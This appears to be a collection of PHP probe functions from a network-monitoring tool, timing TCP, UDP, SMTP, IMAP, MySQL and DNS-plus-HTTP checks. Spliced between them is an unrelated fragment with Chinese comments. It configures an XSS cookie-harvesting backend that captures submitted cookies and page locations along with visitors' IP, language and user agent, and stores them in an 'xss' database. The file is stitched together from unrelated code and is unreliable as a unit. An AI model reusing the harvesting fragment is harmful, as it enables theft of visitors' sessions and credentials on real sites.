/**
 * TCP connect test: times how long it takes to open a TCP socket to $hostname on port $param.
 *
 * Returns the elapsed time reported by TFNTimer on success,
 * -2 when ip_lookup() reports failure ("0"), and -1 when the socket could not be opened.
 * $testname and $params are accepted for the common DoTest signature but not used here.
 */
function DoTest($testname, $param, $hostname, $timeout, $params)
{
    global $NATS;

    $stopwatch = new TFNTimer();

    // No test-specific timeout: fall back to the system-wide setting.
    if ($timeout <= 0) {
        $timeout = $NATS->Cfg->Get("test.tcp.timeout", 0);
    }
    // System setting missing or non-positive as well: use 60 seconds.
    if ($timeout <= 0) {
        $timeout = 60;
    }

    // Resolve first so that name resolution is not part of the timed section.
    $address = ip_lookup($hostname);
    if ($address == "0") {
        return -2; // lookup failed
    }

    $errCode = 0;
    $errText = "";

    $stopwatch->Start();
    // '@' silences PHP warnings; $errCode/$errText are filled in by fsockopen() but never
    // reported, so the caller only ever sees the generic -1.
    $socket = @fsockopen($address, $param, $errCode, $errText, $timeout);
    $duration = $stopwatch->Stop();

    if ($socket === false) {
        return -1; // open failed
    }

    @fclose($socket);

    return $duration;
}
/**
 * Verbose variant of the TCP connect test: same probe, with progress echoed to the output.
 *
 * Returns the elapsed time reported by TFNTimer on success,
 * -2 when ip_lookup() reports failure ("0"), and -1 when the socket could not be opened.
 * Unlike the quiet variant it applies no default when $timeout is non-positive.
 */
function DoTest($testname, $param, $hostname, $timeout, $params)
{
    echo "Called for ", $hostname, " port ", $param, " timeout ", $timeout, "\n";

    $stopwatch = new TFNTimer();

    $address = ip_lookup($hostname);
    echo $hostname, " => ", $address, "\n";
    if ($address == "0") {
        return -2; // lookup failed
    }
    echo "Lookup Successful\n";

    $errCode = 0;
    $errText = "";

    $stopwatch->Start();
    echo "Doing fsockopen()\n";
    // Warnings are suppressed with '@'; $errCode/$errText are populated but never printed.
    $socket = @fsockopen($address, $param, $errCode, $errText, $timeout);
    $duration = $stopwatch->Stop();

    // Echoing the handle prints the resource id on success and an empty string for false.
    echo "FP is : ", $socket, "\n";

    if ($socket === false) {
        return -1; // open failed
    }

    echo "Closing\n";
    @fclose($socket);

    return $duration;
}
/**
 * SMTP test wrapper: resolves the host in $params[0] and hands the address to smtp_test_time().
 *
 * Returns -1 when ip_lookup() reports failure ("0"); otherwise whatever smtp_test_time() returns.
 * $params[1] is passed through as the second argument of smtp_test_time()
 * (presumably the port - confirm against that helper).
 */
function DoTest($testname, $param, $hostname, $timeout, $params)
{
    // Resolve DNS up front and pass the address on to the SMTP check.
    $serverIp = ip_lookup($params[0]);

    if ($serverIp != "0") {
        return smtp_test_time($serverIp, $params[1], $timeout);
    }

    return -1; // lookup failed
}
/**
 * IMAP/mail test wrapper: resolves the host and delegates to imap_test_time().
 *
 * $params layout: 0: host, 1: user, 2: pass, 3: protocol, 4: port, 5: ssl (1/0).
 * Returns -1 when ip_lookup() reports failure ("0"); otherwise whatever imap_test_time() returns.
 */
function DoTest($testname, $param, $hostname, $timeout, $params)
{
    // Only the value 1 (loosely compared) switches SSL on.
    $useSsl = ($params[5] == 1);

    $serverIp = ip_lookup($params[0]);
    if ($serverIp == "0") {
        return -1; // lookup failed
    }

    $user = $params[1];
    $pass = $params[2];
    $protocol = $params[3];
    $port = $params[4];

    return imap_test_time($serverIp, $user, $pass, $timeout, $protocol, $port, $useSsl);
}
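/**
 * Combined DNS + web fetch test.
 *
 * Queries the DNS server given in $params[1] for the A record of the host named in the
 * URL ($param), then fetches the URL with cURL and returns the DNS time plus the fetch time.
 *
 * $params[1]  DNS server to query (name or address, passed through ip_lookup())
 * $params[2]  minimum delay, in the units TFNTimer::Stop() reports, before the TCP retry
 *
 * Return values:
 *   -3  no DNS server configured
 *   -1  host could not be extracted from the URL, or the DNS query failed / had no records
 *   -2  the URL fetch failed or downloaded (after rounding) 0 KB
 *   otherwise the summed DNS and fetch times
 */
function DoTest($testname, $param, $hostname, $timeout, $params)
{
    $timer = new TFNTimer();

    // First initialise DNS query object
    $dnsserver = $params[1];
    if ($dnsserver == "") {
        return -3;
    }
    $dnsserver = ip_lookup($dnsserver);

    $url = $param;

    $dns_delay = $params[2];
    if ($dns_delay == 0 || !is_numeric($dns_delay)) {
        $dns_delay = 0; // default no extra delay
    }

    if ($timeout <= 0) {
        $timeout = 60;
    }

    $udp = true; // initial setting
    $port = 53;
    $dns_query = new DNSQuery($dnsserver, $port, $timeout, $udp, false); // run with debug off
    $type = "A";

    // Strip out the hostname for the FQDN lookup. The capture group is only populated when
    // the pattern matches, so an unparseable URL is reported as a DNS failure instead of
    // being carried forward as an undefined value.
    $matches = array();
    if (preg_match("@^(?:http[s]*://)?([^/|\\?|:]+)@i", $url, $matches) !== 1) {
        return -1;
    }
    $hostname = $matches[1];

    // A host made only of digits and dots is treated as an IP literal and skips the DNS stage.
    $host_no_dots = str_replace(".", "", $hostname);
    $is_ip_address = is_numeric($host_no_dots);

    $timer->Start();

    if (!$is_ip_address) {
        $answer = $dns_query->Query($hostname, $type);

        if ($answer === false || $dns_query->error) {
            // UDP attempt failed: switch to TCP and retry once the configured delay has passed.
            $udp = false;
            $dns_query->udp = $udp;

            while ($timer->Stop() < $dns_delay) {
                usleep(100);
            }

            $answer = $dns_query->Query($hostname, $type);
        }

        // Check for a failed query BEFORE touching ->count; the previous order read a
        // property of false when the retry failed as well.
        if ($answer === false) {
            return -1; // object is false
        }
        if ($dns_query->error) {
            return -1; // DNS object error
        }
        if ($answer->count <= 0) {
            return -1; // no records returned
        }

        $dns_time_taken = $timer->Stop();

        // if we get this far the DNS has worked
        url_lookup($url); // pre-cache DNS
    } else {
        $dns_time_taken = 0;
    }

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    // NOTE(review): peer and host verification are switched off, so a successful fetch only
    // shows that something answered on the address, not that it was the intended server.
    // Confirm this is meant to be an availability-only check.
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_MAXREDIRS, 32);
    // Redirect targets are chosen by the remote server; keep followed redirects on HTTP(S)
    // so a response cannot steer the probe onto another protocol handler.
    if (defined('CURLOPT_REDIR_PROTOCOLS')) {
        curl_setopt($ch, CURLOPT_REDIR_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    }
    if ($timeout > 0) {
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
        curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
    }

    // restart timer
    $timer->Start();
    $output = curl_exec($ch);
    if (!$output) {
        $ctr = -1; // failed
    } else {
        // downloaded size in KB, two decimals
        $ctr = round(curl_getinfo($ch, CURLINFO_SIZE_DOWNLOAD) / 1024, 2);
    }
    $fetch_time_taken = $timer->Stop();
    curl_close($ch);

    if ($ctr <= 0) {
        return -2; // URL request failed
    }

    return $dns_time_taken + $fetch_time_taken; // return elapsed time taken
}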
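/**
 * Resolve the host part of a URL, or a bare hostname, through ip_lookup().
 *
 * Input containing a colon after its first character is treated as a URL and the host is
 * extracted with a regular expression; anything else is looked up as given.
 * Returns whatever ip_lookup() returns for the chosen host.
 */
function url_lookup($url)
{
    // Default: look up the input unchanged (bare hostname, or a URL that cannot be parsed).
    $hostname = $url;

    // strpos() yields false when there is no colon and 0 when the colon is the first
    // character; the loose comparison deliberately treats both as "not a URL".
    $colon = strpos($url, ":");
    if ($colon != 0) {
        $matches = array();
        // Only read the capture group when the pattern matched; previously a non-matching
        // input (for example one starting with "/") left $matches[1] undefined.
        if (preg_match("@^(?:http[s]*://)?([^/|\\?|:]+)@i", $url, $matches) === 1) {
            $hostname = $matches[1];
        }
    }

    // try direct
    return ip_lookup($hostname);
}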
/***是否启用数据库***/ $use_db = true; /***数据库选项***/ $MYSQL_HOST = 'localhost'; $MYSQL_PORT = '3306'; $MYSQL_USER = '******'; $MYSQL_PASS = '******'; $MYSQL_DBNM = 'xss'; /***使用文件存储模式下,creds和payloads路径,建议使用md5哈希后的复杂目录***/ $store_path = "./e160e60f7414a7bba0b46565c1ce0646/"; /***Cookie生成规则***/ #$token = md5(md5(md5(base64_encode(date("Y-m-d").$_SERVER['REMOTE_ADDR'].$username.$password)))); $token = md5(md5(md5(base64_encode($username . $password)))); /***全局参数***/ $ip = base64_encode($_SERVER['REMOTE_ADDR']); $area = base64_encode(ip_lookup()); $time = date('Y-m-d H:i:s'); $user_lang = base64_encode($_SERVER['HTTP_ACCEPT_LANGUAGE']); $user_agent = base64_encode($_SERVER['HTTP_USER_AGENT']); /***当收到数据时触发XSS函数***/ if ($_REQUEST["cookie"] or $_REQUEST["location"]) { $cookie = base64_encode($_REQUEST['cookie']); $referer = base64_encode($_REQUEST['location']); xss(); } $common_head = <<<EOF <!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8"/> <meta http-equiv="Cache-Control" content="max-age=0" forua="true"/>
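/**
 * UDP test: sends $params[1] to $hostname on port $param and waits for a reply line.
 *
 * $params[1]  payload to send (empty string when absent)
 * $params[2]  1 when a response is required for the test to pass
 *
 * Return values:
 *   -1  socket could not be opened
 *   -2  ip_lookup() reported failure ("0")
 *   -3  nothing was written to the socket
 *   -4  no response although one was required
 *   -5  no response and the read returned before the timeout (looks like a hard reject)
 *   otherwise the elapsed time reported by TFNTimer ("0.001" when it measured 0)
 */
function DoTest($testname, $param, $hostname, $timeout, $params)
{
    global $NATS;

    // No test-specific timeout: fall back to the system-wide setting.
    if ($timeout <= 0) {
        $timeout = $NATS->Cfg->Get("test.udp.timeout", 0);
    }
    // System setting missing or non-positive as well: use 20 seconds.
    if ($timeout <= 0) {
        $timeout = 20;
    }

    // isset() guards keep a short $params array from raising undefined-index notices.
    $package = (isset($params[1]) && $params[1] != "") ? $params[1] : "";
    $reqresponse = (isset($params[2]) && $params[2] == 1);

    $timer = new TFNTimer();

    $ip = ip_lookup($hostname);
    if ($ip == "0") {
        return -2; // lookup failed
    }

    $connstr = "udp://" . $ip;
    $errno = 0;
    $errstr = "";

    $timer->Start();
    // '@' silences PHP warnings; $errno/$errstr are filled in but never reported.
    $fp = @fsockopen($connstr, $param, $errno, $errstr, $timeout);
    if ($fp === false) {
        return -1; // open failed
    }

    stream_set_timeout($fp, $timeout);

    $write = fwrite($fp, $package); // send some data
    if (!$write) {
        // Release the socket before bailing out; it was left open on this path before.
        // NOTE(review): an empty payload writes 0 bytes and therefore also lands here -
        // confirm that a test without a payload is meant to fail with -3.
        @fclose($fp);
        return -3; // failed to send data
    }

    $read = fgets($fp);
    @fclose($fp);
    $elapsed = $timer->Stop();

    if (!$read) {
        if ($reqresponse) {
            return -4;
        }
        if (round($elapsed, 0) < $timeout) {
            return -5; // looks like a hard reject e.g. ICMP port unreachable
        }
        // Otherwise the read ran into the timeout without a reject: fall through and report the time.
    }

    if ($elapsed == 0) {
        $elapsed = "0.001"; // never report exactly 0 for a completed test
    }

    return $elapsed;
}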
/**
 * MySQL test dispatcher for the "mysql", "mysqlrows" and "mysqldata" test names.
 *
 * $params layout as noted by the author: 0: host, 1: user, 2: pass, 3: database, 4: query
 * ("mysqldata" additionally passes $params[5]). The host actually used is $param.
 * Returns -1 for an unknown test name or when ip_lookup() reports failure ("0");
 * otherwise the result of the matching mysql_test_* helper.
 */
function DoTest($testname, $param, $hostname, $timeout, $params)
{
    // Pick the helper first so an unknown test name never triggers a lookup.
    if ($testname == "mysql") {
        $mode = "time";
    } elseif ($testname == "mysqlrows") {
        $mode = "rows";
    } elseif ($testname == "mysqldata") {
        $mode = "data";
    } else {
        return -1;
    }

    // The lookup only warms the cache and validates the name. The helpers still receive the
    // original $param, because 127.0.0.1 is not the same connection as localhost for MySQL auth.
    if (ip_lookup($param) == "0") {
        return -1;
    }

    switch ($mode) {
        case "time":
            return mysql_test_time($param, $params[1], $params[2], $params[3], $timeout, $params[4]);
        case "rows":
            return mysql_test_rows($param, $params[1], $params[2], $params[3], $timeout, $params[4]);
        default: // "data"
            return mysql_test_data($param, $params[1], $params[2], $params[3], $timeout, $params[4], $params[5]);
    }
}